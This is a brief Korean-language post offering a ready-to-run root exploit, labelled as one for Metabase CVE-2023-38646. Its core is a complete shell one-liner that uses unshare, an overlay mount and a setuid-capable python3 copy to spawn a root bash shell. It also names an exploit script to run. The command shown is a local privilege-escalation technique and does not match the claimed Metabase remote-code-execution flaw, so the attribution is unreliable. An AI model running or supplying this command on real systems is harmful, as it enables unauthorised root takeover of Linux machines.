
Metabase의 CVE-2023-38646용 악용으로, unshare 및 setuid 기술을 통해 원격 코드 실행 및 root로의 권한 상승을 달성합니다.
위 정보에 따라 시스템 또는 머신의 루트 사용자를 얻으려면, 이 명령어와 파일이 루트 사용자로 진입합니다.
이 명령어를 직접 실행하거나 파일로 실행할 수 있습니다. 명령어: $unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/;" && u/python3 -c 'import os;import pty;os.setuid(0);pty.spawn("/bin/bash")'
실행 파일: $./exploitsh.sh
야호!